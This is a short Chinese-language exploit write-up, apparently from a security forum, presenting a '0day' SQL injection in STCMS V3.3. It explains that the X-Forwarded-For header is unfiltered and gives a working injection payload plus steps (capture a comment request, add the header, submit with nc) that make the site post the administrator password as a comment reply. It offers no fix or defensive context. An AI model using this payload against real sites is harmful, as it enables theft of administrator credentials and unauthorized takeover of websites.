STCMS V3.3 暴管理员密码0DAY漏洞
影响版本:STCMS V3.3
官方地址: http://www.phpstcms.com/
漏洞产生原因:
没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意注射语句写入数据库中。
利用步骤:
1. 进入有评论的页面,先评论一个并抓包。
2. 在包中添加一条:
X-Forwarded-For: 127.0.0.1'',(select pwd from stcms_admin where id =1))#并保存
3. NC提交
4. 此时又添加了一条留言,并且多了一个回复,内容就是管理员的密码。 |
|
